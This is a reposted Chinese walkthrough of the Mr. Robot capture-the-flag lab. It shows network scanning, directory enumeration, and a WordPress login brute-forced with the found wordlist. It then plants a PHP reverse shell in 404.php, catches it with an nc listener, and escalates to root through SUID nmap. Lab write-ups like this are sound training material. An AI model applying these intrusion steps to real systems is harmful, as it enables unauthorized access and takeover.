欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 科技 > 能源 > mrRobot解题过程

mrRobot解题过程

2025/5/5 4:15:50 来源:https://blog.csdn.net/qq_74263993/article/details/144169915  浏览:    关键词:mrRobot解题过程

一、靶场环境需要桥接网络

不建议使用校园网,因为使用校园网进行主机探索的时候会出现数不完的主机。

arp-scan -l

若是流量少只能用校园网,便在这里看靶机ip

二、端口扫描

我习惯用fscan了(需要自己安装),你们用nmap也一样的

fscan -h ip
nmap -sS ip

三、开始找线索

访问网页,所有流程走一下,并没有发现什么有用的东西。

进行目录扫描

我用的是dirsearch(需要自己安装),用dirb也能扫出来

dirsearch -u http://xxx.xxx.xxx
dirb http://xxx.xxx.xxx

访问robots.txt, 发现两个文件,其中根据key-1-of-3.txt文件名可以知道有三个flag,而这是第一个。

访问key-1-of-3.txt

访问fsocity.dic发现是一个字典(可以先留着)

访问wp-admin页面

弱口令无效,使用之前找到的字典,对用户名进行爆破。

字典有八十多万个,而用户名却在最后几个(有点ex人),用户名为elliot

接着对系统进行指纹扫描,不出意外是WordPress(因为有很多wp)

nikto -h +靶机ip

使用wpscan进行密码破解,还是用那个字典

还是要爆破很久,密码为ER28-0652

四、漏洞发现及利用

发现在Appearance下的Editor处存在代码编辑的功能,我们选择编辑404.php

 将kali下的反弹shell代码复制出来替换404.php的内容(记得保存)

cd /usr/share/webshells/phpcat php-reverse-shell.php

记得ip和端口要改成kali的ip和监听的端口

kali使用nc监听,要对应404.php里的端口

nc lvp 8888

访问404.php

发现kali已经连接上了

使用命令优化终端

python -c  'import pty;pty.spawn("/bin/sh")'

 进入home,发现robot用户

发现第发现robot的密码,使用MD5解密

进入robot用户,拿到第二个flag

su robot
abcdefghijklmnopqrstuvwxyz

 

 五、提高权限

 (查找有SUID权限的文件)

find / -perm -4000 2>/dev/null 

使用nmap进行提权

nmap --interactive!sh

查找第三个flag

find / -name key-3-of-3.txt

 

 结束!

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词